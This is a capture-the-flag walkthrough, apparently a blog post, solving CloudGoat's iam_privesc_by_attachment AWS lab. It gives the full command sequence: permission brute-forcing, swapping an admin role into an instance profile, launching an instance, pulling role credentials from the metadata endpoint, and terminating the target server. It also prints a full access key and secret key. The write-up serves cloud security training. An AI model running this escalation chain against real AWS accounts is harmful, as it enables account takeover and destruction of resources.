Cloudgoat AWS CTF solution- Scenerio 5 (iam_privesc_by_attachment)

n00🔑
5 min readOct 19, 2022

Scenario: iam_privesc_by_attachment

Deployment:

git clone https://github.com/RhinoSecurityLabs/cloudgoat.git
cd cloudgoat
chmod +x cloudgoat.py
./cloudgoat.py create iam_privesc_by_attachment
~/.aws/credentials

Scenario Resources

  • 1 VPC with: EC2 x 1
  • 1 IAM User

Scenario Start(s)

  1. IAM User “Kerrigan”

Scenario Goal(s)

Delete the EC2 instance “cg-super-critical-security-server”

Summary

Starting with a very limited set of permissions, the attacker is able to leverage the instance-profile-attachment permissions to create a new EC2 instance with significantly greater privileges than their own. With access to this new EC2 instance, the attacker gains full administrative powers within the target account and is able to accomplish the scenario’s goal — deleting the cg-super-critical-security-server and paving the way for further nefarious actions.

Exploitation Route(s)

Walkthrough — IAM User “kerrigan”

  1. Starting as the IAM user “Kerrigan,” the attacker uses their limited privileges to explore the environment.

a. Used pacu’s “iam__bruteforce_permissions” module to enumerate permissions-

run iam__bruteforce_permissions
ec2:                                                                                                                                                        
describe_iam_instance_profile_associations
describe_instances
describe_security_groups
describe_subnets
describe_vpcs
get_associated_enclave_certificate_iam_roles
get_console_screenshot
get_host_reservation_purchase_preview

s3:
get_object_torrent
head_bucket

b. Using iam-enumerate to Bruteforce permissions.

git clone https://github.com/andresriancho/enumerate-iam.git
cd enumerate-iam/
pip3 install -r requirements.txt
cd enumerate_iam
git clone https://github.com/aws/aws-sdk-js.git
python3 generate_bruteforce_tests.py

after downloading aws-sdk-js in “enumerate_iam” folder run the generate_bruteforce_tests.py script.

c. Running “enumerate-iam

python3 enumerate-iam.py --access-key AKIA4SM4ZEUHX7V5LYEU --secret-key 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

2. Checking running ec2 instances using ec2:DescribeInstances-

aws ec2 describe-instances --region us-east-1 --profile kerrigan --output text

3. Checking available instance profiles-

aws iam list-instance-profiles --profile kerrigan

We found a interesting instance profile “arn:aws:iam::864154101007:instance-profile/cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22” with role “cg-ec2-meek-role-iam_privesc_by_attachment_cgidztq4yffc22”.

4. Let’s list roles as we have list-roles permissions-

aws iam list-roles --profile kerrigan

We found 2 interesting roles-

cg-ec2-meek-role-iam_privesc_by_attachment_cgidztq4yffc22 and cg-ec2-mighty-role-iam_privesc_by_attachment_cgidztq4yffc22 and by looking at the name “mighty” one seems more interesting.

5. Let’s try to add “mighty” role to the instance profile.

Note: Our enumeration tools like pacu or iam-enumerate were unable to determine these four permissions-

“iam:AddRoleToInstanceProfile”,“iam:RemoveRoleFromInstanceProfile”, “ec2:AssociateIamInstanceProfile”,”ec2:RunInstances

but upon manually checking I found our user has these additional permissions..

aws iam add-role-to-instance-profile --instance-profile-name cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22 --role-name cg-ec2-mighty-role-iam_privesc_by_attachment_cgidztq4yffc22  --profile kerrigan

we got an error “Cannot exceed quota for InstanceSessionsPerInstanceProfile: 1”. Let’s try to remove the existing attached role and try to add “mighty” role-

aws iam remove-role-from-instance-profile --instance-profile-name cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22 --role-name cg-ec2-meek-role-iam_privesc_by_attachment_cgidztq4yffc22 --profile kerriganaws iam add-role-to-instance-profile --instance-profile-name cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22 --role-name cg-ec2-mighty-role-iam_privesc_by_attachment_cgidztq4yffc22  --profile kerrigan
we didn’t got any error this time

6. Now we can use “AssociateIamInstanceProfile” permission to associate this profile(“cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22”) with running ec2.

aws ec2 associate-iam-instance-profile --iam-instance-profile file://instance_profile.json --instance-id "i-0f1a8f37275d27fcd" --profile kerrigan --region
us-east-1

7. No we are ready to spin an ec2 instance with full permissions

a) Creating ec2 ssh_key_pair

aws ec2 create-key-pair --key-name pwned --profile kerrigan --query 'KeyMaterial' --region us-east-1 --output text > pwned.pem

b) Running ec2-

aws ec2 describe-security-groups --profile kerrigan --region us-east-1aws ec2 describe-subnets --profile kerrigan --region us-east-1
aws ec2 run-instances --image-id ami-0a313d6098716f372 --instance-type t2.micro --iam-instance-profile Arn=arn:aws:iam::864154101007:instance-profile/cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgid7c11loyvlf --key-name pwned --profile kerrigan --subnet-id subnet-07be3953f5accbd47 --security-group-ids sg-0523b1376503ede0a --region us-east-1
Then use describeinstance to get public ip

8. Logging in and fetching credentials from this instance-

ssh -i pwned.pem ubuntu@54.145.230.120
curl 169.254.169.254/latest/meta-data/iam/security-credentials/

OR

We can directly install aws cli withing the ec2 instance and then run the commands within ec2 cli.

9. Using these credentials to delete “cg-super-critical-security-server”

#Determining instance id
aws ec2 describe-instances --region us-east-1 --profile ec2_role

i-0064345de3f005c7a

aws ec2 terminate-instances --instance-ids i-0064345de3f005c7a --region us-east-1 --profile ec2_role

References:

https://github.com/RhinoSecurityLabs/cloudgoat/blob/master/scenarios/iam_privesc_by_attachment/README.md

--

--